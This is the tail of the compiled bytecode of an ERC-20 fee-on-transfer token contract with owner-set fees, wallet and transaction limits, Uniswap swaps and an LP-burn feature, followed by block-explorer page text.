5b602060008282546137c89190614d34565b92505081905550601a54601b54826137e09190614b56565b6137ea9190614bdf565b601e60008282546137fb9190614d34565b9250508190555061392c565b602360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561386257506000601654115b1561392b5761388f606461388160165488613acc90919063ffffffff16565b613ae290919063ffffffff16565b9050601654601854826138a29190614b56565b6138ac9190614bdf565b601f60008282546138bd9190614d34565b92505081905550601654601954826138d59190614b56565b6138df9190614bdf565b602060008282546138f09190614d34565b92505081905550601654601754826139089190614b56565b6139129190614bdf565b601e60008282546139239190614d34565b925050819055505b5b600081111561394157613940873083613af8565b5b808561394d919061595d565b94505b61395b878787613af8565b505050505b505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80602360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b60008183613ada9190614b56565b905092915050565b60008183613af09190614bdf565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415613b68576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b5f906155c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415613bd8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613bcf9061565a565b60405180910390fd5b613be3838383614226565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015613c69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c6090615a03565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254613cfc9190614d34565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051613d609190614809565b60405180910390a3613d7384848461422b565b50505050565b6000613d843061140e565b90506000602054601e54601f54613d9b9190614d34565b613da59190614d34565b9050600080831480613db75750600082145b15613dc45750505061405e565b6014600b54613dd39190614b56565b831115613dec576014600b54613de99190614b56565b92505b6000600283601f5486613dff9190614b56565b613e099190614bdf565b613e139190614bdf565b90506000613e2a828661423090919063ffffffff16565b90506000479050613e3a82614246565b6000613e4f824761423090919063ffffffff16565b90506000613e7a87613e6c601e5485613acc90919063ffffffff16565b613ae290919063ffffffff16565b90506000613ea588613e9760205486613acc90919063ffffffff16565b613ae290919063ffffffff16565b90506000818385613eb6919061595d565b613ec0919061595d565b90506000601f819055506000601e819055506000602081905550600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051613f2090615a54565b60006040518083038185875af1925050503d8060008114613f5d576040519150601f19603f3d011682016040523d82523d6000602084013e613f62565b606091505b505080985050600087118015613f785750600081115b15613fc557613f878782614483565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5618682601f54604051613fbc93929190615a69565b60405180910390a15b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff164760405161400b90615a54565b60006040518083038185875af1925050503d8060008114614048576040519150601f19603f3d011682016040523d82523d6000602084013e61404d565b606091505b505080985050505050505050505050505b565b60004260108190555060003073ffffffffffffffffffffffffffffffffffffffff166370a082317f000000000000000000000000b5cb4a06ac03ceaacceec76fc932cf008b2b60856040518263ffffffff1660e01b81526004016140c491906145a0565b602060405180830381865afa1580156140e1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906141059190615405565b90506000614132612710614124600d5485613acc90919063ffffffff16565b613ae290919063ffffffff16565b9050600081111561416b5761416a7f000000000000000000000000b5cb4a06ac03ceaacceec76fc932cf008b2b608561dead83613af8565b5b60007f000000000000000000000000b5cb4a06ac03ceaacceec76fc932cf008b2b608590508073ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156141d857600080fd5b505af11580156141ec573d6000803e3d6000fd5b505050507f454c91ae84fcc766ddda0dcb289f26b3d0176efeacf4061fc219fa6ca8c3048d60405160405180910390a16001935050505090565b505050565b505050565b6000818361423e919061595d565b905092915050565b6000600267ffffffffffffffff81111561426357614262615aa0565b5b6040519080825280602002602001820160405280156142915781602001602082028036833780820191505090505b50905030816000815181106142a9576142a8615acf565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561434e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906143729190615b13565b8160018151811061438657614385615acf565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506143eb307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d846129a5565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b815260040161444d959493929190615c39565b600060405180830381600087803b15801561446757600080fd5b505af115801561447b573d6000803e3d6000fd5b505050505050565b6144ae307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d846129a5565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d71982308560008061dead426040518863ffffffff1660e01b815260040161451596959493929190615c93565b60606040518083038185885af1158015614533573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906145589190615cf4565b5050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061458a8261455f565b9050919050565b61459a8161457f565b82525050565b60006020820190506145b56000830184614591565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156145f55780820151818401526020810190506145da565b83811115614604576000848401525b50505050565b6000601f19601f8301169050919050565b6000614626826145bb565b61463081856145c6565b93506146408185602086016145d7565b6146498161460a565b840191505092915050565b6000602082019050818103600083015261466e818461461b565b905092915050565b600080fd5b6146848161457f565b811461468f57600080fd5b50565b6000813590506146a18161467b565b92915050565b6000819050919050565b6146ba816146a7565b81146146c557600080fd5b50565b6000813590506146d7816146b1565b92915050565b600080604083850312156146f4576146f3614676565b5b600061470285828601614692565b9250506020614713858286016146c8565b9150509250929050565b60008115159050919050565b6147328161471d565b82525050565b600060208201905061474d6000830184614729565b92915050565b60006020828403121561476957614768614676565b5b600061477784828501614692565b91505092915050565b6000819050919050565b60006147a56147a061479b8461455f565b614780565b61455f565b9050919050565b60006147b78261478a565b9050919050565b60006147c9826147ac565b9050919050565b6147d9816147be565b82525050565b60006020820190506147f460008301846147d0565b92915050565b614803816146a7565b82525050565b600060208201905061481e60008301846147fa565b92915050565b60006020828403121561483a57614839614676565b5b6000614848848285016146c8565b91505092915050565b60008060006060848603121561486a57614869614676565b5b600061487886828701614692565b935050602061488986828701614692565b925050604061489a868287016146c8565b9150509250925092565b600060ff82169050919050565b6148ba816148a4565b82525050565b60006020820190506148d560008301846148b1565b92915050565b6148e48161471d565b81146148ef57600080fd5b50565b600081359050614901816148db565b92915050565b6000806000606084860312156149205761491f614676565b5b600061492e868287016146c8565b935050602061493f868287016146c8565b9250506040614950868287016148f2565b9150509250925092565b6000806040838503121561497157614970614676565b5b600061497f85828601614692565b9250506020614990858286016148f2565b9150509250929050565b6000806000606084860312156149b3576149b2614676565b5b60006149c1868287016146c8565b93505060206149d2868287016146c8565b92505060406149e3868287016146c8565b9150509250925092565b600060208284031215614a0357614a02614676565b5b6000614a11848285016148f2565b91505092915050565b60008060408385031215614a3157614a30614676565b5b6000614a3f85828601614692565b9250506020614a5085828601614692565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680614aa157607f821691505b60208210811415614ab557614ab4614a5a565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000614af16020836145c6565b9150614afc82614abb565b602082019050919050565b60006020820190508181036000830152614b2081614ae4565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000614b61826146a7565b9150614b6c836146a7565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615614ba557614ba4614b27565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000614bea826146a7565b9150614bf5836146a7565b925082614c0557614c04614bb0565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b6000614c6c602f836145c6565b9150614c7782614c10565b604082019050919050565b60006020820190508181036000830152614c9b81614c5f565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b6000614cfe6028836145c6565b9150614d0982614ca2565b604082019050919050565b60006020820190508181036000830152614d2d81614cf1565b9050919050565b6000614d3f826146a7565b9150614d4a836146a7565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115614d7f57614d7e614b27565b5b828201905092915050565b7f63616e6e6f7420736574206275796261636b206d6f7265206f6674656e20746860008201527f616e206576657279203130206d696e7574657300000000000000000000000000602082015250565b6000614de66033836145c6565b9150614df182614d8a565b604082019050919050565b60006020820190508181036000830152614e1581614dd9565b9050919050565b7f4d75737420736574206175746f204c50206275726e2070657263656e7420626560008201527f747765656e20302520616e642031302500000000000000000000000000000000602082015250565b6000614e786030836145c6565b9150614e8382614e1c565b604082019050919050565b60006020820190508181036000830152614ea781614e6b565b9050919050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b6000614ee4601d836145c6565b9150614eef82614eae565b602082019050919050565b60006020820190508181036000830152614f1381614ed7565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614f766039836145c6565b9150614f8182614f1a565b604082019050919050565b60006020820190508181036000830152614fa581614f69565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006150086025836145c6565b915061501382614fac565b604082019050919050565b6000602082019050818103600083015261503781614ffb565b9050919050565b7f4d757374206b656570206665657320617420343025206f72206c657373000000600082015250565b6000615074601d836145c6565b915061507f8261503e565b602082019050919050565b600060208201905081810360008301526150a381615067565b9050919050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b60006151066024836145c6565b9150615111826150aa565b604082019050919050565b60006020820190508181036000830152615135816150f9565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b60006151986035836145c6565b91506151a38261513c565b604082019050919050565b600060208201905081810360008301526151c78161518b565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b600061522a6034836145c6565b9150615235826151ce565b604082019050919050565b600060208201905081810360008301526152598161521d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006152bc6026836145c6565b91506152c782615260565b604082019050919050565b600060208201905081810360008301526152eb816152af565b9050919050565b7f4d757374207761697420666f7220636f6f6c646f776e20746f2066696e697368600082015250565b60006153286020836145c6565b9150615333826152f2565b602082019050919050565b600060208201905081810360008301526153578161531b565b9050919050565b7f4d6179206e6f74206e756b65206d6f7265207468616e20313025206f6620746f60008201527f6b656e7320696e204c5000000000000000000000000000000000000000000000602082015250565b60006153ba602a836145c6565b91506153c58261535e565b604082019050919050565b600060208201905081810360008301526153e9816153ad565b9050919050565b6000815190506153ff816146b1565b92915050565b60006020828403121561541b5761541a614676565b5b6000615429848285016153f0565b91505092915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061548e6024836145c6565b915061549982615432565b604082019050919050565b600060208201905081810360008301526154bd81615481565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006155206022836145c6565b915061552b826154c4565b604082019050919050565b6000602082019050818103600083015261554f81615513565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006155b26025836145c6565b91506155bd82615556565b604082019050919050565b600060208201905081810360008301526155e1816155a5565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006156446023836145c6565b915061564f826155e8565b604082019050919050565b6000602082019050818103600083015261567381615637565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b60006156b06016836145c6565b91506156bb8261567a565b602082019050919050565b600060208201905081810360008301526156df816156a3565b9050919050565b7f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60008201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b60208201527f20616c6c6f7765642e0000000000000000000000000000000000000000000000604082015250565b60006157686049836145c6565b9150615773826156e6565b606082019050919050565b600060208201905081810360008301526157978161575b565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b60006157fa6035836145c6565b91506158058261579e565b604082019050919050565b60006020820190508181036000830152615829816157ed565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b60006158666013836145c6565b915061587182615830565b602082019050919050565b6000602082019050818103600083015261589581615859565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b60006158f86036836145c6565b91506159038261589c565b604082019050919050565b60006020820190508181036000830152615927816158eb565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052600160045260246000fd5b6000615968826146a7565b9150615973836146a7565b92508282101561598657615985614b27565b5b828203905092915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006159ed6026836145c6565b91506159f882615991565b604082019050919050565b60006020820190508181036000830152615a1c816159e0565b9050919050565b600081905092915050565b50565b6000615a3e600083615a23565b9150615a4982615a2e565b600082019050919050565b6000615a5f82615a31565b9150819050919050565b6000606082019050615a7e60008301866147fa565b615a8b60208301856147fa565b615a9860408301846147fa565b949350505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050615b0d8161467b565b92915050565b600060208284031215615b2957615b28614676565b5b6000615b3784828501615afe565b91505092915050565b6000819050919050565b6000615b65615b60615b5b84615b40565b614780565b6146a7565b9050919050565b615b7581615b4a565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b615bb08161457f565b82525050565b6000615bc28383615ba7565b60208301905092915050565b6000602082019050919050565b6000615be682615b7b565b615bf08185615b86565b9350615bfb83615b97565b8060005b83811015615c2c578151615c138882615bb6565b9750615c1e83615bce565b925050600181019050615bff565b5085935050505092915050565b600060a082019050615c4e60008301886147fa565b615c5b6020830187615b6c565b8181036040830152615c6d8186615bdb565b9050615c7c6060830185614591565b615c8960808301846147fa565b9695505050505050565b600060c082019050615ca86000830189614591565b615cb560208301886147fa565b615cc26040830187615b6c565b615ccf6060830186615b6c565b615cdc6080830185614591565b615ce960a08301846147fa565b979650505050505050565b600080600060608486031215615d0d57615d0c614676565b5b6000615d1b868287016153f0565b9350506020615d2c868287016153f0565b9250506040615d3d868287016153f0565b915050925092509256fea2646970667358221220dff2cd898c17c1c7b6b118a1035a586875424589fb62f7b58f6dff12380050fb64736f6c634300080a0033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.